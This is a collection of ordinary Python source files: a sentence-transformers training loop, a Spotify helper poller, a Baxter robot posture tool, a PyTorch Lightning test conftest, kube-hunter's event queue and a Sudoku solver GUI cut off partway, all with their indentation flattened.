:param train_objectives: Tuples of (DataLoader, LossFunction). Pass more than one for multi-task learning
:param evaluator: An evaluator (sentence_transformers.evaluation) evaluates the model performance during training on held-out dev data. It is used to determine the best model that is saved to disc.
:param epochs: Number of epochs for training
:param steps_per_epoch: Number of training steps per epoch. If set to None (default), one epoch is equal the DataLoader size from train_objectives.
:param scheduler: Learning rate scheduler. Available schedulers: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
:param warmup_steps: Behavior depends on the scheduler. For WarmupLinear (default), the learning rate is increased from 0 up to the maximal learning rate. After these many training steps, the learning rate is decreased linearly back to zero.
:param optimizer_class: Optimizer
:param optimizer_params: Optimizer parameters
:param weight_decay: Weight decay for model parameters
:param evaluation_steps: If > 0, evaluate the model using evaluator after each number of training steps
:param output_path: Storage path for the model and evaluation files
:param output_path_ignore_not_empty: By default, training will stop if output_path is not empty. If set to true, this error will be ignored and training proceeds.
:param save_best_model: If true, the best model (according to evaluator) is stored at output_path
:param max_grad_norm: Used for gradient clipping.
:param use_amp: Use Automatic Mixed Precision (AMP). Only for Pytorch >= 1.6.0
:param callback: Callback function that is invoked after each evaluation.
It must accept the following three parameters in this order:
`score`, `epoch`, `steps`
"""
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
if not output_path_ignore_not_empty and len(os.listdir(output_path)) > 0:
raise ValueError("Output directory ({}) already exists and is not empty.".format(
output_path))
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
device = self._target_device
for loss_model in loss_models:
loss_model.to(device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch"):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
#logging.info("Restart data_iterator")
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = batch_to_device(data, self._target_device)
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
self._eval_during_training(evaluator, output_path, save_best_model, epoch,
-1, callback)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
if evaluator is not None:
score = evaluator(self, output_path=output_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score and save_best_model:
self.save(output_path)
self.best_score = score
def _get_scheduler(self, optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
spotify_web_helper.py
|
from json.decoder import JSONDecodeError
import logging
from random import choices
from socket import SOCK_STREAM
from string import ascii_lowercase
import threading
import psutil
from psutil import CONN_LISTEN
import requests
from requests.exceptions import ConnectionError, Timeout
__all__ = ('wait_for_helper', 'connect_to_helper', 'SpotifyWebHelperObserver')
################################################################################################################################################################
logger = logging.getLogger(__name__)
################################################################################################################################################################
def wait_for_helper(npn, terminating):
while not terminating.is_set():
candidate_ports = frozenset(
conn.laddr[1]
for proc in psutil.process_iter() if (
proc.name() == 'SpotifyWebHelper.exe'
)
for conn in proc.connections() if (
(conn.type == SOCK_STREAM) and
(conn.status == CONN_LISTEN) and
(conn.raddr == ()) and
(conn.laddr[0] == '127.0.0.1') and
(conn.laddr[1] >= 4370) and
(conn.laddr[1] <= 4379)
)
)
for port in candidate_ports:
if connect_to_helper(npn, terminating, port):
break # We're exiting cleanly; no need to test further ports or back off…
else:
terminating.wait(2) # No successful connections were established; back off…
def connect_to_helper(npn, terminating, port):
player_name = 'Spotify Web Helper via port {0:d}'.format(port)
subdomain = ''.join(choices(ascii_lowercase, k=10))
base_url = 'https://{0:s}.spotilocal.com:{1:d}'.format(subdomain, port)
token_url = '{0:s}/simplecsrf/token.json'.format(base_url)
status_url = '{0:s}/remote/status.json'.format(base_url)
headers = {'Origin': 'https://open.spotify.com'}
logger.info('«{0:s}» will try RPC…'.format(player_name))
try:
# We can only get a token if Spotify's running…
while not terminating.is_set():
response = requests.get(token_url, headers=headers, timeout=(3.5, 6.5)).json()
if 'token' in response:
csrf = response['token']
break
else:
terminating.wait(2)
else:
logger.info('«{0:s}» is bailing…'.format(player_name))
return True
oauth = requests.get('https://open.spotify.com/token', timeout=(3.5, 6.5)).json()['t']
logger.info('«{0:s}» can RPC…'.format(player_name))
return_after = 0
old_track = None
while not terminating.is_set():
status = requests.get(status_url, params={
'csrf': csrf,
'oauth': oauth,
'returnafter': return_after,
'returnon': 'login,logout,play,pause,error,ap' if return_after else '',
}, headers=headers, timeout=(3.5, return_after + 6.5)).json()
return_after = 60
if not status.get('running', False):
terminating.wait(2)
continue
elif status.get('playing', False):
(artist, title) = (status['track']['artist_resource']['name'], status['track']['track_resource']['name'])
new_track = (artist, title)
else:
new_track = None
if new_track != old_track:
if new_track is not None:
logger.info('«{0:s}» notified us that it is now playing «{1:s}» by «{2:s}»…'.format(player_name, title, artist))
npn.notify(player_name, new_track)
else:
logger.info('«{0:s}» notified us that it is no longer playing anything…'.format(player_name))
npn.notify(player_name, None)
old_track = new_track
logger.info('«{0:s}» is bailing…'.format(player_name))
return True
except (ConnectionError, Timeout, JSONDecodeError, KeyError) as e:
logger.info('«{0:s}» RPC failed…'.format(player_name), exc_info=e)
return False
finally:
npn.notify(player_name, None)
class SpotifyWebHelperObserver:
__slots__ = ('_terminating', '_thread')
def __init__(self, npn):
self._terminating = threading.Event()
self._thread = threading.Thread(target=wait_for_helper, name='SpotifyWebHelperObserverThread', args=(npn, self._terminating))
self._thread.start()
def close(self):
self._terminating.set()
self._thread.join()
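# A minimal usage sketch: the notifier object `npn` only needs a
# notify(player_name, track_or_None) method; its concrete class is an assumption.
#   observer = SpotifyWebHelperObserver(npn)
#   ...  # track changes are reported through npn.notify() while the helper runs
#   observer.close()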
|
set_posture.py
|
#!/usr/bin/env python
"""
Tool that use to set Baxter into different modes
"""
import os
import rospy
import argparse
import baxter_interface
import yaml
from ik_solver import solve_IK
import threading
import alloy.ros
def move_arm_to_pose(limb_name, pose):
#create the baxter interface
limb_interface = baxter_interface.Limb(limb_name)
#do IK to solve the position
joint_position = solve_IK(limb_name, pose)
#zip the name and positions
joint_position = dict(zip(joint_position.name, joint_position.position))
#move the limb to the position
limb_interface.move_to_joint_positions(joint_position)
def move_to_posture(posture_name,record_path="posture_records.yaml", block=True, done_cb=None):
#rospy.init_node("bax_set_posture")
left_limb = baxter_interface.Limb('left')
right_limb = baxter_interface.Limb('right')
#resolve path
record_path = alloy.ros.resolve_res_path(record_path,"success_baxter_tools")
if record_path:
with open(record_path,'r') as f:
posture_list = yaml.safe_load(f)
joint_angles = posture_list[posture_name]
if 'left' in joint_angles and 'right' in joint_angles:
lt = threading.Thread(target=left_limb.move_to_joint_positions, args=(joint_angles['left'],))
rt = threading.Thread(target=right_limb.move_to_joint_positions, args=(joint_angles['right'],))
lt.start()
rt.start()
lt.join()
rt.join()
elif 'left' in joint_angles:
left_limb.move_to_joint_positions(joint_angles['left'])
elif 'right' in joint_angles:
right_limb.move_to_joint_positions(joint_angles['right'])
def save_posture(posture_name, button_control=True, arm=None, record_path="posture_records.yaml"):
if button_control:
left_nav = baxter_interface.Navigator('left')
right_nav = baxter_interface.Navigator('right')
while not left_nav.button0 and not right_nav.button0:
rospy.sleep(0.1)
#save the position
left_joint_angles = baxter_interface.Limb('left').joint_angles()
right_joint_angles = baxter_interface.Limb('right').joint_angles()
posture_list = dict()
#resolve path
record_path = alloy.ros.resolve_res_path(record_path,"success_baxter_tools")
#create the file at the root of `success_baxter_tools/res` if it doesn't exist
if record_path is None:
record_path = os.path.join(alloy.ros.create_res_dir("success_baxter_tools"),"posture_records.yaml")
#save them to some type of files
if not os.path.exists(record_path):
yaml.dump(posture_list, open(record_path, 'w'))
with open(record_path, 'r') as f:
    posture_list = yaml.safe_load(f)
if arm == 'right':
posture_list[posture_name] = {
'right': right_joint_angles
}
elif arm == 'left':
posture_list[posture_name] = {
'left': left_joint_angles,
}
else:
posture_list[posture_name] = {
'left': left_joint_angles,
'right': right_joint_angles
}
with open(record_path, 'w') as f:
    yaml.dump(posture_list, f)
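# A minimal usage sketch (posture name and ROS node setup are assumptions):
#   rospy.init_node("bax_set_posture")
#   save_posture("neutral")       # press a navigator button to record both arms
#   move_to_posture("neutral")    # later, move both arms back to that posture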
|
conftest.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import signal
import sys
import threading
from functools import partial
from http.server import SimpleHTTPRequestHandler
from pathlib import Path
import pytest
import torch.distributed
from pytorch_lightning.plugins.environments.lightning_environment import find_free_network_port
from pytorch_lightning.trainer.connectors.signal_connector import SignalConnector
from pytorch_lightning.utilities.imports import _IS_WINDOWS, _TORCH_GREATER_EQUAL_1_8
from tests import _PATH_DATASETS
@pytest.fixture(scope="session")
def datadir():
return Path(_PATH_DATASETS)
@pytest.fixture(scope="function", autouse=True)
def preserve_global_rank_variable():
"""Ensures that the rank_zero_only.rank global variable gets reset in each test."""
from pytorch_lightning.utilities.distributed import rank_zero_only
rank = getattr(rank_zero_only, "rank", None)
yield
if rank is not None:
setattr(rank_zero_only, "rank", rank)
@pytest.fixture(scope="function", autouse=True)
def restore_env_variables():
"""Ensures that environment variables set during the test do not leak out."""
env_backup = os.environ.copy()
yield
leaked_vars = os.environ.keys() - env_backup.keys()
# restore environment as it was before running the test
os.environ.clear()
os.environ.update(env_backup)
# these are currently known leakers - ideally these would not be allowed
allowlist = {
"CUBLAS_WORKSPACE_CONFIG", # enabled with deterministic flag
"CUDA_DEVICE_ORDER",
"LOCAL_RANK",
"NODE_RANK",
"WORLD_SIZE",
"MASTER_ADDR",
"MASTER_PORT",
"PL_GLOBAL_SEED",
"PL_SEED_WORKERS",
"WANDB_MODE",
"HOROVOD_FUSION_THRESHOLD",
"RANK", # set by DeepSpeed
"POPLAR_ENGINE_OPTIONS", # set by IPUPlugin
# set by XLA
"TF2_BEHAVIOR",
"XRT_MESH_SERVICE_ADDRESS",
"XRT_TORCH_DIST_ROOT",
"XRT_MULTI_PROCESSING_DEVICE",
"XRT_SHARD_WORLD_SIZE",
"XRT_LOCAL_WORKER",
"XRT_HOST_WORLD_SIZE",
"XRT_SHARD_ORDINAL",
"XRT_SHARD_LOCAL_ORDINAL",
}
leaked_vars.difference_update(allowlist)
assert not leaked_vars, f"test is leaking environment variable(s): {set(leaked_vars)}"
@pytest.fixture(scope="function", autouse=True)
def restore_signal_handlers():
"""Ensures that signal handlers get restored before the next test runs.
This is a safety net for tests that don't run Trainer's teardown.
"""
valid_signals = SignalConnector._valid_signals()
if not _IS_WINDOWS:
# SIGKILL and SIGSTOP are not allowed to be modified by the user
valid_signals -= {signal.SIGKILL, signal.SIGSTOP}
handlers = {signum: signal.getsignal(signum) for signum in valid_signals}
yield
for signum, handler in handlers.items():
if handler is not None:
signal.signal(signum, handler)
@pytest.fixture(scope="function", autouse=True)
def teardown_process_group():
"""Ensures that the distributed process group gets closed before the next test runs."""
yield
if torch.distributed.is_available() and torch.distributed.is_initialized():
torch.distributed.destroy_process_group()
@pytest.fixture(scope="function", autouse=True)
def reset_deterministic_algorithm():
"""Ensures that torch determinism settings are reset before the next test runs."""
yield
if _TORCH_GREATER_EQUAL_1_8:
torch.use_deterministic_algorithms(False)
else:
torch.set_deterministic(False)
@pytest.fixture
def caplog(caplog):
"""Workaround for https://github.com/pytest-dev/pytest/issues/3697.
Setting ``filterwarnings`` with pytest breaks ``caplog`` when ``not logger.propagate``.
"""
import logging
lightning_logger = logging.getLogger("pytorch_lightning")
propagate = lightning_logger.propagate
lightning_logger.propagate = True
yield caplog
lightning_logger.propagate = propagate
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(("localhost", 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
@pytest.fixture
def single_process_pg():
"""Initialize the default process group with only the current process for testing purposes.
The process group is destroyed when the with block is exited.
"""
if torch.distributed.is_initialized():
raise RuntimeError("Can't use `single_process_pg` when the default process group is already initialized.")
orig_environ = os.environ.copy()
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = str(find_free_network_port())
os.environ["RANK"] = "0"
os.environ["WORLD_SIZE"] = "1"
torch.distributed.init_process_group("gloo")
try:
yield
finally:
torch.distributed.destroy_process_group()
os.environ.clear()
os.environ.update(orig_environ)
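# A minimal usage sketch (hypothetical test, not part of this conftest):
#   def test_something_distributed(single_process_pg):
#       assert torch.distributed.get_world_size() == 1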
def pytest_collection_modifyitems(items):
# filter out special tests
if os.getenv("PL_RUN_STANDALONE_TESTS", "0") == "1":
items[:] = [
item
for item in items
for marker in item.own_markers
# has `@RunIf(standalone=True)`
if marker.name == "skipif" and marker.kwargs.get("standalone")
]
elif os.getenv("PL_RUN_SLOW_TESTS", "0") == "1":
items[:] = [
item
for item in items
for marker in item.own_markers
# has `@RunIf(slow=True)`
if marker.name == "skipif" and marker.kwargs.get("slow")
]
|
handler.py
|
import logging
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from kube_hunter.conf import config
from kube_hunter.core.types import ActiveHunter, HunterBase
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
logger = logging.getLogger(__name__)
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue, object):
def __init__(self, num_worker=10):
super(EventQueue, self).__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.all_hunters = dict()
self.hooks = defaultdict(list)
self.filters = defaultdict(list)
self.running = True
self.workers = list()
for _ in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
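# A minimal usage sketch (event and hunter names are placeholders):
#   @handler.subscribe(SomeEvent)
#   class SomeHunter(HunterBase):
#       def __init__(self, event):
#           self.event = event
#       def execute(self):
#           ...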
# wrapper takes care of the subscribe once mechanism
def subscribe_once(self, event, hook=None, predicate=None):
def wrapper(hook):
# installing a __new__ magic method on the hunter
# which will remove the hunter from the list upon creation
def __new__unsubscribe_self(self, cls):
handler.hooks[event].remove((hook, predicate))
return object.__new__(self)
hook.__new__ = __new__unsubscribe_self
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
if ActiveHunter in hook.__mro__:
if not config.active:
return
self.active_hunters[hook] = hook.__doc__
elif HunterBase in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if HunterBase in hook.__mro__:
self.all_hunters[hook] = hook.__doc__
# registering filters
if EventFilterBase in hook.__mro__:
if hook not in [h for h, _ in self.filters[event]]:
self.filters[event].append((hook, predicate))
logger.debug(f"{hook} filter subscribed to {event}")
# registering hunters
elif hook not in [h for h, _ in self.hooks[event]]:
self.hooks[event].append((hook, predicate))
logger.debug(f"{hook} subscribed to {event}")
def apply_filters(self, event):
# if filters are subscribed, apply them on the event
for hooked_event in self.filters.keys():
if hooked_event in event.__class__.__mro__:
for filter_hook, predicate in self.filters[hooked_event]:
if predicate and not predicate(event):
continue
logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
event = filter_hook(event).execute()
# if filter decided to remove event, returning None
if not event:
return None
return event
# getting instantiated event object
def publish_event(self, event, caller=None):
# setting event chain
if caller:
event.previous = caller.event
event.hunter = caller.__class__
# applying filters on the event, before publishing it to subscribers.
# if filter returned None, not proceeding to publish
event = self.apply_filters(event)
if event:
# If event was rewritten, make sure it's linked to its parent ('previous') event
if caller:
event.previous = caller.event
event.hunter = caller.__class__
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if config.statistics and caller:
if Vulnerability in event.__class__.__mro__:
caller.__class__.publishedVulnerabilities += 1
logger.debug(f"Event {event.__class__} got published with {event}")
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
try:
hook = self.get()
logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
hook.execute()
except Exception as ex:
logger.debug(ex, exc_info=True)
finally:
self.task_done()
logger.debug("closing thread...")
def notifier(self):
time.sleep(2)
# should consider locking on unfinished_tasks
while self.unfinished_tasks > 0:
logger.debug(f"{self.unfinished_tasks} tasks left")
time.sleep(3)
if self.unfinished_tasks == 1:
logger.debug("final hook is hanging")
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)
|
gui.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 2 19:11:28 2020
@author: victor
"""
from tkinter import *
from timeit import default_timer as timer
from tkinter import messagebox
import threading
import copy
from sudokucsp import SudokuCSP
# if you want to verify that my csp.py does a better job just change
# from csp import ... to from original import ... , original is the csp.py file from AIMA code
from csp import backtracking_search, mrv, unordered_domain_values, forward_checking, mac, no_inference
MARGIN = 20 # Pixels around the board
SIDE = 50 # Width of every board cell
WIDTH_B = HEIGHT_B = MARGIN * 2 + SIDE * 9 # Width and height of the whole board
WIDTH = WIDTH_B + 180 # Width of board and buttons solve and reset
class SudokuUI(Frame):
def __init__(self, parent):
self.parent = parent
# we start with a blank board
self.original_board = [[0 for j in range(9)] for i in range(9)]
# of course we keep another board in which we will show the solution
self.current_board = copy.deepcopy(self.original_board)
Frame.__init__(self, parent)
self.row, self.col = 0, 0
self.__initUI()
def __initUI(self):
# we will initialize the widgets that will be shown in the gui
self.pack(fill=BOTH, expand=1)
self.canvas = Canvas(self, width=WIDTH_B, height=HEIGHT_B)
self.canvas.pack(fill=BOTH, side=TOP)
self.canvas.grid(row=0, column=0, rowspan=30, columnspan=60)
# level will be used to select the lvl of the board, 1 means easy and 2 hard
self.level = IntVar(value=1)
# which will be used to select which board at which lvl, there are 3 for each level
self.which = 0
# we will need a StringVar so that the client can see the time used by an algorithm
self.time = StringVar()
self.time.set("Time: ")
# same for number of backtracks
self.n_bt = StringVar()
self.n_bt.set("N. BT: ")
self.make_menu()
# the default will be the board of lvl 1 and which 1
self.__change_level()
self.clear_button = Button(self, text="Reset", command=self.__clear_board, width=15, height=5)
self.clear_button.grid(row=10, column=61, padx=20, columnspan=3)
self.solve_button = Button(self, text="Solve", command=self.solve_clicked, width=15, height=5)
self.solve_button.grid(row=13, column=61, padx=20, columnspan=3)
lbltime = Label(self, textvariable=self.time)
lblBT = Label(self, textvariable=self.n_bt)
Label(self, text="Inference: ").grid(row=14, column=61)
lbltime.grid(row=30, column=0)
lblBT.grid(row=32, column=0)
self.inference = StringVar()
self.radio = []
self.radio.append(Radiobutton(self, text="No Inference", variable=self.inference, value="NO_INFERENCE"))
self.radio[0].grid(row=15, column=62, padx=2)
self.radio.append(Radiobutton(self, text="FC ", variable=self.inference, value="FC"))
self.radio[1].grid(row=16, column=62)
self.radio.append(Radiobutton(self, text="MAC ", variable=self.inference, value="MAC"))
self.radio[2].grid(row=17, column=62)
self.inference.set("NO_INFERENCE")
Label(self, text="Variable to choose:").grid(row=18, column=61)
lbltime.grid(row=30, column=0)
lblBT.grid(row=32, column=0)
self.var_to_choose = StringVar()
self.radio.append(Radiobutton(self, text="MRV", variable=self.var_to_choose, value="MRV"))
self.radio[3].grid(row=20, column=62)
self.var_to_choose.set("MRV")
self.__draw_grid()
self.__draw_puzzle()
def solve_clicked(self):
# we are searching for a solution so it is good to disable buttons
for rb in self.radio:
rb.config(state=DISABLED)
self.clear_button.config(state=DISABLED)
self.solve_button.config(state=DISABLED)
self.menu_bar.entryconfig("Level", state="disabled")
p = threading.Thread(target=self.solve_sudoku)
p.start()
messagebox.showinfo("Working", "We are looking for a solution, please wait some seconds ...")
def solve_sudoku(self):
s = SudokuCSP(self.current_board)
inf, dv, suv = None, None, None
if self.inference.get() == "NO_INFERENCE":
inf = no_inference
elif self.inference.get() == "FC":
inf = forward_checking
elif self.inference.get() == "MAC":
inf = mac
if self.var_to_choose.get() == "MRV":
suv = mrv
start = timer()
a = backtracking_search(s, select_unassigned_variable=suv, order_domain_values=unordered_domain_values,
inference=inf)
end = timer()
# if a isn't null we found a solution so we will show it in the current board
# if a is null then we send a message to the user that the initial board
# breaks some constraints
if a:
for i in range(9):
for j in range(9):
index = i * 9 + j
self.current_board[i][j] = a.get("CELL" + str(index))
else:
messagebox.showerror("Error", "Invalid sudoku puzzle, please check the initial state")
# showing solution
self.__draw_puzzle()
self.time.set("Time: "+str(round(end-start, 5))+" seconds")
self.n_bt.set("N. BR: "+str(s.n_bt))
# re-enabling buttons for search a new solution
for rb in self.radio:
rb.config(state=NORMAL)
self.clear_button.config(state=NORMAL)
self.solve_button.config(state=NORMAL)
self.menu_bar.entryconfig("Level", state="normal")
def make_menu(self):
# creating menu with level Easy and Hard
self.menu_bar = Menu(self.parent)
self.parent.configure(menu=self.menu_bar)
level_menu = Menu(self.menu_bar, tearoff=False)
self.menu_bar.add_cascade(label="Level", menu=level_menu)
level_menu.add_radiobutton(label="Easy", variable=self.level, value=1, command=self.__change_level)
level_menu.add_radiobutton(label="Hard", variable=self.level, value=2, command=self.__change_level)
def __change_level(self):
# to add a new board, you just have to change %3 to %4 and then add another
# clause elif like "elif self.which == 3:"
self.which = (self.which+1) % 3
if self.level.get() == 1:
if self.which == 0:
self.original_board[0] = [0, 6, 0, 3, 0, 0, 8, 0, 4]
self.original_board[1] = [5, 3, 7, 0, 9, 0, 0, 0, 0]
self.original_board[2] = [0, 4, 0, 0, 0, 6, 0, 0, 7]
self.original_board[3] = [0, 9, 0, 0, 5, 0, 0, 0, 0]
self.original_board[4] = [0, 0, 0, 0, 0, 0, 0, 0, 0]
self.original_board[5] = [7, 1, 3, 0, 2, 0, 0, 4, 0]
self.original_board[6] = [3, 0, 6, 4, 0, 0, 0, 1, 0]
self.original_board[7] = [0, 0, 0, 0, 6, 0, 5, 2, 3]
self.original_board[8] = [1, 0, 2, 0, 0, 9, 0, 8, 0]
elif self.which == 1:
self.original_board[0] = [7, 9, 0, 4, 0, 2, 3, 8, 1]
self.original_board[1] = [5, 0, 3, 0, 0, 0, 9, 0, 0]
self.original_board[2] = [0, 0, 0, 0, 3, 0, 0, 7, 0]
self.original_board[3] = [0, 0, 0, 0, 0, 5, 0, 0, 2]
self.original_board[4] = [9, 2, 0, 8, 1, 0, 7, 0, 0]
self.original_board[5] = [4, 6, 0, 0, 0, 0, 5, 1, 9]
self.original_board[6] = [0, 1, 0, 0, 0, 0, 2, 3, 8]
self.original_board[7] = [8, 0, 0, 0, 4, 1, 0, 0, 0]
self.original_board[8] = [0, 0, 9, 0, 8, 0, 1, 0, 4]
elif self.which == 2:
self.original_board[0] = [0, 3, 0, 5, 0, 6, 2, 0, 0]
self.original_board[1] = [8, 2, 0, 0, 0, 1, 0, 0, 4]
self.original_board[2] = [6, 0, 7, 8, 3, 0, 0, 9, 1]
self.original_board[3] = [0, 0, 0, 0, 0, 0, 0, 2, 9]
self.original_board[4] = [5, 0, 0, 6, 0, 7, 0, 0, 3]
self.original_board[5] = [3, 9, 0, 0, 0, 0, 0, 0, 0]
self.original_board[6] = [4, 5, 0, 0, 8, 9, 1, 0, 2]
self.original_board[7] = [9, 0, 0, 1, 0, 0, 0, 4, 6]
self.original_board[8] = [0, 0, 3, 7, 0, 4, 0, 5, 0]
elif self.level.get() == 2:
if self.which == 0:
self.original_board[0] = [8, 0, 0, 0, 0, 0, 0, 0, 0]
self.original_board[1] = [0, 0, 3, 6, 0, 0, 0, 0, 0]
self.original_board[2] = [0, 7, 0, 0, 9, 0, 2, 0, 0]
self.original_board[3] = [0, 5, 0, 0, 0, 7, 0, 0, 0]
self.original_board[4] = [0, 0, 0, 0, 4, 5, 7, 0, 0]
self.original_board[5] = [0, 0, 0, 1, 0, 0, 0, 3, 0]
self.original_board[6] = [0, 0, 1, 0, 0, 0, 0, 6, 8]
self.original_board[7] = [0, 0, 8, 5, 0, 0, 0, 1, 0]
self.original_board[8] = [0, 9, 0, 0, 0, 0, 4, 0, 0]
elif self.which == 1:
self.original_board[0] = [2, 0, 0, 0, 0, 0, 0, 4, 3]
self.original_board[1] = [1, 9, 0, 0, 3, 0, 0, 0, 0]
self.original_board[2] = [0, 6, 0, 0, 0, 5, 0, 0, 0]
self.original_board[3] = [0, 5, 0, 2, 6, 0, 0, 0, 8]
self.original_board[4] = [0, 0, 0, 0, 7, 0, 0, 0, 0]
self.original_board[5] = [6, 0, 0, 0, 5, 3, 0, 1, 0]
self.original_board[6] = [0, 0, 0, 6, 0, 0, 0, 2, 0]
